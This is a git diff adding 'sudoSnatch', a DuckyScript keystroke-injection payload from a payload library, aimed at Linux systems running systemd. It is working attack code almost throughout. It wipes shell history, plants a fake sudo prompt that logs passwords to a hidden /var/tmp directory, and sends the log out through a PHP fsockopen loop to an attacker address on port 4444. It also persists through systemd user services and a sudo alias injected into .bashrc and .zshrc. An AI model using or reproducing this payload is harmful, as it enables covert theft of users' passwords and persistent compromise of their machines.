diff --git a/payloads/library/credentials/sudoSnatch/payload.txt b/payloads/library/credentials/sudoSnatch/payload.txt new file mode 100644 index 0000000..2781871 --- /dev/null +++ b/payloads/library/credentials/sudoSnatch/payload.txt @@ -0,0 +1,84 @@ +REM Title: sudoSnatch +REM Description: sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally.. +REM AUTHOR: drapl0n +REM Version: 1.0 +REM Category: Credentials +REM Target: Unix-like operating systems with systemd +REM Attackmodes: HID +REM Note: Replace IP address and port number on line no. 34 with yours. +REM Note: Use command: [nc -l -p ] to fetch captured passwords on attacking machine. + +REM [keeping tracks clear] +DELAY 500 +CTRL-ALT t +DELAY 400 +STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE +ENTER +DELAY 100 + +REM [creating password grabbing mechanism] +STRING mkdir /var/tmp/.system +ENTER +DELAY 100 +STRING echo -e "#\!/bin/bash\necho -n \"[sudo] password for \$(whoami):\"\nIFS=\"\" read -s pass\necho -e \"Timestamp=[\$(date)] \\\t User=[\$(whoami)] \\\t Password=[\$pass]\" >> /var/tmp/.system/sysLog\necho -e \"\\\nSorry, try again.\"" > /var/tmp/.system/systemMgr +ENTER +DELAY 100 +STRING touch /var/tmp/.system/sysLog +ENTER +DELAY 100 +STRING chmod +x /var/tmp/.system/systemMgr +ENTER +DELAY 100 + +REM [creating reverse shell] +STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus +ENTER +DELAY 100 +STRING chmod +x /var/tmp/.system/systemBus +ENTER +DELAY 100 + +REM [creating systemd service to execute payload on boot] +STRING mkdir -p ~/.config/systemd/user +ENTER +DELAY 200 +STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service +ENTER +DELAY 100 + +REM [creating reboot script incase if listner stops or targets internet connection gets lost] +STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot +ENTER +DELAY 100 +STRING chmod +x /var/tmp/.system/reboot +ENTER +DELAY 100 + +REM [creating systemd service for reboot] +STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service +ENTER +DELAY 100 + +REM [enabling services] +STRING systemctl --user daemon-reload +ENTER +DELAY 300 +STRING systemctl --user enable --now systemBUS.service +ENTER +DELAY 150 +STRING systemctl --user start --now systemBUS.service +ENTER +DELAY 150 +STRING systemctl --user enable --now reboot.service +ENTER +DELAY 150 +STRING systemctl --user start --now reboot.service +ENTER +DELAY 100 + +REM [autostarting service on terminal/shell launch] +STRING echo -e "#\!/bin/bash\nls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.zshrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.bashrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.bashrc\nfi" > ~/tmmmp +ENTER +DELAY 100 +STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit +ENTER